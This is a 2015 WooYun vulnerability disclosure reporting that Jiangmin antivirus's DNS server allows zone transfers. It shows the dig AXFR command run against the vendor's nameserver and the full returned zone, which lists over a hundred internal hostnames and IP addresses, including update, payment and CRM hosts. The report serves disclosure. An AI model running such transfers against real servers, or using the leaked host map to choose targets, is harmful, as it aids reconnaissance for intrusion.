江民杀毒 DNS域传送漏洞 | wooyun-2015-095499

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-095499

漏洞标题：

江民杀毒 DNS域传送漏洞

漏洞详情

披露状态：

2015-02-03：细节已通知厂商并且等待厂商处理中
2015-02-08：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

域传送~

详细说明：

dig.exe axfr @dns.jiangmin.com.cn jiangmin.com.cn

; <<>> DiG 9.9.5-W1 <<>> axfr @dns.jiangmin.com.cn jiangmin.com.cn
; (1 server found)
;; global options: +cmd
; Transfer failed.
C:\Users\home\Desktop\暴力破解\edu-dns-zone-transfer-master\BIND9>dig.exe axfr @dns.jiangmin.com.cn jiang
; <<>> DiG 9.9.5-W1 <<>> axfr @dns.jiangmin.com.cn jiangmin.com
; (1 server found)
;; global options: +cmd
jiangmin.com.           3600    IN      SOA     dns1.jiangmin.com.cn. hostmaster. 1060 900 600 60 3600
jiangmin.com.           3600    IN      A       114.112.190.38
jiangmin.com.           3600    IN      NS      dns1.jiangmin.com.cn.
jiangmin.com.           3600    IN      NS      dns.jiangmin.com.cn.
jiangmin.com.           3600    IN      NS      dns2.jiangmin.com.cn.
jiangmin.com.           3600    IN      MX      10 mx.ym.163.com.
jiangmin.com.           3600    IN      TXT     "v=spf1 include:spf.163.com -all"
jiangmin.com.           0       IN      TYPE65281 \# 24 00000000000000020000038400000002CA668044CA668644
dns1.jiangmin.com.cn.   3600    IN      A       115.28.130.183
dns.jiangmin.com.cn.    3600    IN      A       115.28.130.183
dns2.jiangmin.com.cn.   3600    IN      A       115.28.130.183
08update1.jiangmin.com. 3600    IN      A       115.28.189.96
08update10.jiangmin.com. 3600   IN      CNAME   08update1.jiangmin.com.
08update11.jiangmin.com. 3600   IN      CNAME   08update1.jiangmin.com.
08update12.jiangmin.com. 3600   IN      CNAME   08update1.jiangmin.com.
08update13.jiangmin.com. 3600   IN      CNAME   08update1.jiangmin.com.
08update2.jiangmin.com. 3600    IN      CNAME   08update1.jiangmin.com.
08update3.jiangmin.com. 3600    IN      CNAME   08update1.jiangmin.com.
08update4.jiangmin.com. 3600    IN      CNAME   08update1.jiangmin.com.
08update5.jiangmin.com. 3600    IN      CNAME   08update1.jiangmin.com.
08update6.jiangmin.com. 3600    IN      CNAME   08update1.jiangmin.com.
08update7.jiangmin.com. 3600    IN      CNAME   08update1.jiangmin.com.
08update8.jiangmin.com. 3600    IN      CNAME   08update1.jiangmin.com.
08update9.jiangmin.com. 3600    IN      CNAME   08update1.jiangmin.com.
123.jiangmin.com.       3600    IN      A       121.42.147.207
30wish.jiangmin.com.    3600    IN      A       219.238.45.146
a.jiangmin.com.         3600    IN      A       115.28.130.183
active.jiangmin.com.    3600    IN      A       115.28.189.96
active1.jiangmin.com.   3600    IN      A       115.28.189.96
anquanbao.jiangmin.com. 3600    IN      A       116.218.141.234
bank.jiangmin.com.      3600    IN      A       115.28.189.96
bbs.jiangmin.com.       3600    IN      A       121.42.147.207
build08.jiangmin.com.   3600    IN      A       114.215.82.64
buy.jiangmin.com.       3600    IN      A       115.28.189.96
club.jiangmin.com.      3600    IN      A       115.28.189.96
cncert.jiangmin.com.    3600    IN      A       60.212.17.6
corp.jiangmin.com.      3600    IN      NS      jm-dns.
d.jiangmin.com.         3600    IN      A       115.28.130.183
dl.jiangmin.com.        3600    IN      A       115.28.189.96
dongguan.jiangmin.com.  3600    IN      A       61.145.196.122
dsupdate1.jiangmin.com. 3600    IN      A       60.31.214.213
dsupdate2.jiangmin.com. 3600    IN      A       221.8.71.28
dsupdate3.jiangmin.com. 3600    IN      A       202.100.84.88
dsupdate4.jiangmin.com. 3600    IN      A       61.128.122.77
dsupdate5.jiangmin.com. 3600    IN      A       125.46.61.41
e.jiangmin.com.         3600    IN      A       115.28.189.96
ec.jiangmin.com.        3600    IN      A       115.28.189.96
ec1.jiangmin.com.       3600    IN      A       115.28.189.96
ecupdate.jiangmin.com.  3600    IN      A       60.212.17.6
ecupdate1.jiangmin.com. 3600    IN      A       60.212.17.6
edu.jiangmin.com.       3600    IN      A       121.101.223.56
es.jiangmin.com.        3600    IN      A       121.101.223.50
f.jiangmin.com.         3600    IN      A       114.215.82.64
filedown10.jiangmin.com. 3600   IN      A       58.221.42.77
forum.jiangmin.com.     3600    IN      A       121.42.147.207
global.jiangmin.com.    3600    IN      A       60.212.17.10
imcp.jiangmin.com.      3600    IN      CNAME   imcp.ym.163.com.
jm.jiangmin.com.        3600    IN      NS      mail.jiangmin.com.
jmcrm.jiangmin.com.     3600    IN      A       221.122.18.2
jmunion.jiangmin.com.   3600    IN      A       219.238.45.194
jxs.jiangmin.com.       3600    IN      A       219.238.45.222
kvhome.jiangmin.com.    3600    IN      NS      jm.
kvup.jiangmin.com.      3600    IN      A       60.212.17.6
kvwap.jiangmin.com.     3600    IN      A       115.28.189.96
link.jiangmin.com.      3600    IN      A       121.42.147.207
linux.jiangmin.com.     3600    IN      A       115.28.189.96
localhost.jiangmin.com. 3600    IN      A       127.0.0.1
m-up.jiangmin.com.      3600    IN      A       219.238.45.146
mail.jiangmin.com.      3600    IN      CNAME   smtp.ym.163.com.
mapp.jiangmin.com.      3600    IN      A       115.28.189.96
miniupload.jiangmin.com. 3600   IN      A       219.238.45.147
netup.jiangmin.com.     3600    IN      A       115.28.189.96
netupdate.jiangmin.com. 3600    IN      A       114.215.82.64
newlinux.jiangmin.com.  3600    IN      A       114.215.82.64
nstest.jiangmin.com.    3600    IN      A       219.238.45.147
online.jiangmin.com.    3600    IN      A       115.28.189.96
online1.jiangmin.com.   3600    IN      A       115.28.189.96
partner.jiangmin.com.   3600    IN      A       219.238.45.146
passport.jiangmin.com.  3600    IN      A       115.28.189.96
patch.jiangmin.com.     3600    IN      A       114.215.82.64
pay.jiangmin.com.       3600    IN      A       115.28.189.96
pay1.jiangmin.com.      3600    IN      A       115.28.189.96
pay2.jiangmin.com.      3600    IN      A       115.28.189.96
pop3.jiangmin.com.      3600    IN      CNAME   pop3.ym.163.com.
query.jiangmin.com.     3600    IN      A       60.212.17.3
reg.jiangmin.com.       3600    IN      A       61.155.106.59
report.jiangmin.com.    3600    IN      A       60.212.17.4
sell.jiangmin.com.      3600    IN      A       121.42.147.207
shengji.jiangmin.com.   3600    IN      A       221.122.18.2
smtp.jiangmin.com.      3600    IN      CNAME   smtp.ym.163.com.
sou.jiangmin.com.       3600    IN      A       121.42.147.207
trx.jiangmin.com.       3600    IN      A       114.215.82.64
tw.jiangmin.com.        3600    IN      A       210.242.250.34
tw1.jiangmin.com.       3600    IN      A       210.240.1.41
twdown.jiangmin.com.    3600    IN      A       210.240.1.41
twupdate01.jiangmin.com. 3600   IN      A       210.240.1.41
twupdate02.jiangmin.com. 3600   IN      A       210.240.1.41
ty.jiangmin.com.        3600    IN      A       221.122.18.2
up.jiangmin.com.        3600    IN      A       121.42.147.207
update.jiangmin.com.    3600    IN      A       115.28.189.96
update.jiangmin.com.    3600    IN      A       222.135.144.3
update2.jiangmin.com.   3600    IN      A       115.28.189.96
update3.jiangmin.com.   3600    IN      A       114.215.82.64
upload.jiangmin.com.    3600    IN      A       121.42.147.207
urlup.jiangmin.com.     3600    IN      A       121.42.147.207
virusinfo.jiangmin.com. 3600    IN      A       121.42.147.207
virusurl.jiangmin.com.  3600    IN      A       121.42.147.207
vurl.jiangmin.com.      3600    IN      A       121.42.147.207
wap.jiangmin.com.       3600    IN      A       115.28.189.96
webmail.jiangmin.com.   3600    IN      CNAME   ym.163.com.
webupload.jiangmin.com. 3600    IN      A       121.42.147.207
www.jiangmin.com.       3600    IN      A       114.112.190.38
www1.jiangmin.com.      3600    IN      A       222.135.146.3
zk01.jiangmin.com.      3600    IN      A       219.148.61.229
zx.jiangmin.com.        3600    IN      A       219.238.45.139
jiangmin.com.           3600    IN      SOA     dns1.jiangmin.com.cn. hostmaster. 1060 900 600 60 3600
;; Query time: 617 msec
;; SERVER: 115.28.130.183#53(115.28.130.183)
;; WHEN: Tue Feb 03 20:36:48 中国标准时间 2015
;; XFR size: 116 records (messages 1, bytes 3032)

漏洞证明：

漏洞如上

修复方案：

配置下就好了。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-02-08 20:52

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源路人甲@乌云